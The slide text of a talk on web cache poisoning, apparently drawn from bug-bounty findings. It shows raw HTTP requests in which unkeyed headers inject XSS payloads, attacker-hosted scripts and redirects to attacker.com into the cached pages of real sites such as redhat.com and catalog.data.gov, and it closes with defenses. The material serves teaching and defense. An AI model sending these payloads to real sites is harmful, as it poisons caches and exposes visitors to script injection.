  • 13. Quick Example On Web Cache Poisoning
  • 14. A normal request Request: GET /login.php HTTP/1.1 Host: 191.168.56.101 Blah: … Response: Blah: ... <img src=”192.168.56.101/image.png” /> Blah...
  • 15. A funny request Request: GET /login.php HTTP/1.1 Host: 192.168.56.101 X-Forwarded-Host: lol“/><svg onload=’alert(1)’> Blah: ... Response: Blah: … <img src=”lol"/><svg onload='alert(1)'>/image.png” />
  • 16. We all like practicals, don’t we?
  • 18. Cached XSSed Response in redhat.com GET /en?dontpoisoneveryone=1 HTTP/1.1 Host: www.redhat.com X-Forwarded-Host: a."><script>alert(1)</script> HTTP/1.1 200 OK Cache-Control: public, no-cache Blah… <meta property="og:image" content="https://a."><script>alert(1)</script>"/>
  • 19. Discreet Poisoning ● We just poisoned the cache for https://redhat.com/en?dontpoisoneveryone=1 ● We need to be first to send the request whenever this cache expires in order to poison site’s legitimate users. ● We need to reverse engineer cache expiry system and crawl into documentation to figure out exact time the cached object will be expired.
  • 20. unity3d.com Request: GET / HTTP/1.1 Host: unity3d.com X-Host: portswigger-labs.net HTTP/1.1 200 OK Via: 1.1 varnish-v4 Age: 174 Cache-Control: public, max-age=1800 … <script src="https://portswigger- labs.net/sites/files/foo.js"></script>
  • 21. Selective Poisoning GET / HTTP/1.1 Host: redacted.com User-Agent: Mozilla/5.0 … Firefox/60.0 X-Forwarded-Host: a"><iframe onload=alert(1)> HTTP/1.1 200 OK X-Served-By: cache-lhr6335-LHR Vary: User-Agent, Accept-Encoding … <link rel="canonical" href="https://a">a<iframe onload=alert(1)> </iframe>
  • 22. DOM Poisoning Request: GET /dataset HTTP/1.1 Host: catalog.data.gov X-Forwarded-Host: canary Response: HTTP/1.1 200 OK Age: 32707 X-Cache: Hit from cloudfront … <body data-site-root="https://canary/">
  • 23. Request: GET /dataset HTTP/1.1 Host: catalog.data.gov X-Forwarded-Host: id.burpcollaborator.net Response: HTTP/1.1 200 OK Age: 32707 X-Cache: Hit from cloudfront … <body data-site- root="https://id.burpcollaborator.net/">
  • 24. Request: GET /api/i18n/es HTTP/1.1 Host: catalog.data.gov Response: HTTP/1.1 200 OK … {"Show more":"Mostrar más"}
  • 25. Request: GET /api/i18n/es HTTP/1.1 Host: portswigger-labs.net Response: HTTP/1.1 200 OK … {"Show more":"<svg onload=alert(1)>"}
  • 26. ● A cool feature to install addons in background for marketing purposes ● This feature became famous by forcefully installing Mr.Robot extension in background ● They were using Nginx for caching ● Mozilla sent a weird request which contained Origin header in all lowercase Mozilla SHIELD GET /api/v1/recipe/signed/ HTTP/1.1 Blah: ... origin: null Blah: ...
  • 27. Request: GET /api/v1/ HTTP/1.1 Host: normandy.cdn.mozilla.net X-Forwarded-Host: xyz.burpcollaborator.net HTTP/1.1 200 OK { ... "recipe-list": "https://xyz.burpcollaborator.net/a pi/v1/recipe/", "recipe-signed": "https://xyz.burpcollaborator.net/a pi/v1/recipe/signed/", ... }
  • 28. ● Signing was there so we couldn’t install any addon of our choice ● Backend mozilla systems that use unsigned recipes let us peek into system and might help us obtain signing key ● But we could still perform a DDoS ● We could install already signed addons
  • 29. Route Poisoning in goodhire.com ● Some applications dumbly use request headers to generate URLs and use them for routing :) ● goodhire.com is hosted on hubspot.com which is using cloudflare caching server.
  • 30. Route Poisoning in goodhire.com Request: GET / HTTP/1.1 Host: www.goodhire.com X-Forwarded-Server: canary Response: HTTP/1.1 404 Not Found CF-Cache-Status: MISS ... <title>HubSpot - Page not found</title> <p>The domain canary does not exist in our system.</p>
  • 31. Request: GET / HTTP/1.1 Host: www.goodhire.com X-Forwarded-Host: portswigger-labs- 4223616.hs-sites.com Response: HTTP/1.1 200 OK ... <script>alert(document.domain)</script>
  • 32. Hidden route poisoning ● This vulnerability was in blog.cloudflare.com which was using its own caching service ● blog.cloudflare.com is hosted using Ghost.
  • 33. A normal fail response Request: GET / HTTP/1.1 Host: blog.cloudflare.com X-Forwarded-Host: canary Response: HTTP/1.1 302 Found Location: https://ghost.org/fail/
  • 34. Supplying already hosted website Request: GET / HTTP/1.1 Host: blog.cloudflare.com X-Forwarded-Host: blog.binary.com Response: HTTP/1.1 200 OK Normal response Still No Luck :(
  • 35. B...bu….but what if we use a website hosted on ghost? Request: GET / HTTP/1.1 Host: blog.cloudflare.com X-Forwarded-Host: noshandnibble.ghost.io Response: HTTP/1.1 302 Found Location: http://noshandnibble.blog/
  • 36. How much damage can we do with it? ● Files that were cached a. jpg b. png c. pdf d. js e. css
  • 37. Bypassing mixed-content protection ● Mixed-content is when your website is HTTPS and is requesting some resource via HTTP. ● Browsers block this type of imports and this feature is called mixed-content protection. ● This redirect ghost did was an HTTP rather than HTTPS which was a big obstacle. Again stuck :/
  • 38. Luckily, bounty hunters helped ● Safari’s HSTS redirect automatically upgrades it to HTTPS ● HSTS is a technique which is used to prevent data from being eavesdropped by upgrading from HTTP to HTTPS. ● Edge’s 302 response completely bypasses mixed- content protection
  • 39. Chaining unkeyed inputs ● Sometimes, unkeyed inputs only confuse some part of application. ● We will need to chain unkeyed inputs in order to get something useful
  • 40. Request: GET /en HTTP/1.1 Host: redacted.net X-Forwarded-Host: xyz Response: HTTP/1.1 200 OK Set-Cookie: locale=en; domain=xyz Request 1
  • 41. Request: GET /en HTTP/1.1 Host: redacted.net X-Forwarded-Scheme: nothttps Response: HTTP/1.1 301 Moved Permanently Location: https://redacted.net/en Request 2
  • 42. Request 1 + Request 2 = WCP Request: GET /en HTTP/1.1 Host: redacted.net X-Forwarded-Host: attacker.com X-Forwarded-Scheme: nothttps Response: HTTP/1.1 301 Moved Permanently Location: https://attacker.com/en
  • 43. Open Graph Hijacking ● Here’s everyone’s favourite, facebook hacking! ● Open Graph is a protocol developed by Facebook which allows to integrate between facebook and other apps. ● But what if we cache some malicious page which will in turn share what we want to share? Let’s try it out.
  • 44. Request: GET /en HTTP/1.1 Host: redacted.net X-Forwarded-Host: attacker.com Response: HTTP/1.1 200 OK Cache-Control: max-age=0, private, must- revalidate … <meta property="og:url" content='https://attacker.com/en'/>
  • 46. Defense ● Do NOT use caching at all! ● Avoid taking input from headers. ● If do, then include them in cache key. ● Use burp active scanner or Param Miner like tools to find out unkeyed inputs.
  • 47. Thanks ● Connect with me ○ kuldeep.pandya.77799@Facebook ○ some_dank_boi@Instagram ○ Predator77799@Twitter